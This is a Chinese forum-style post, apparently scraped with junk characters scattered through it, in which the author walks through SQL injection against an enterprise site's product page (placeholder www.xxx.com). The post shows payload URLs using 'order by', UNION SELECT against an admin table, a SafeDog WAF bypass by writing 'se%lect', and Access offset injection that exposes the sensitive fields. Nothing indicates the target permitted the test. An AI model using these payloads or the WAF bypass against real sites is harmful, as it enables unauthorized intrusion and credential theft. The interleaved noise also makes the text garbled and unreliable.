打开网站,一个企业站。) i! n) _# }+ R4 g* j
/ y* M) p }0 @( X) E6 ]' E* t3 K' s
0 b3 N' M% @5 Y' Q$ e& C* M顺手加个admin7 R) U9 n" v T) w( U
* \. j7 Y1 p8 j0 K( q
+ k: `! f# I! Y) _' V7 M
默认后台。
. ~( f2 @, @# N% Y回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
/ ?1 r* W1 m0 Z& d5 l
2 ^/ o: N! i, D' g5 s. Z0 F! N6 Y8 I+ Z8 c" K
& ^6 o& T6 j; c) _ j/ j* U" P所以就不用御剑扫了,待会直接封IP。8 U- f3 B' t1 }& {! J# p' u
u: r, t+ |2 `" W用order by语句判断是否存在注入。5 n# C+ S3 R8 w: J9 c, n+ l
http://www.xxx.com /product_show.asp?id=997 order by 12 g/ }$ N$ ^8 Y9 y
http://www.xxx.com /product_show.asp?id=997 order by 100
/ u& w3 F4 x3 \6 U现在存在注入,经测试后发现是9个字段。
6 q# `! n T) u: p) F' y! _$ q4 p ! O' d( M# F9 l# ]
接下来进行联合查询,猜是否存在admin表。
( \0 R5 i* a) A+ t3 qhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。" }3 Z. q( a6 r$ |5 M( ]6 O9 U: \5 w
j( _4 c J( T" Z( N( e8 J3 l; R- k J
. M5 Q7 I: B1 S" d6 b
在select中间加个%,se%lect绕过安全狗。2 `! U8 R& K* t" x4 a
& N T+ K: x$ K3 [) E+ L, Q$ @
0 X/ O G" w( s/ L6 m5 c
发现存在admin表,然后开始手工猜常用的字段。9 t/ A8 H% @ j0 k$ L
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。6 j" J5 B% g. z; {
$ [4 ]- W: K/ c/ T7 ~' O突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
" N* N$ |+ K. k! ^. J
( i8 W/ [$ q0 R2 L: @科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: J, T7 m' e" d! y. t0 Z1 Shttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin1 T% J! y6 X |7 f0 [/ W \* f; e
好了,敏感内容出显了。
$ _, A: o9 V" ]$ q8 ^/ E5 O& V, C! [9 y, {% W1 S* k$ S
# o1 p) h# ~* L T6 j
$ S8 ~ b8 J! Y7 | h" p5 h
|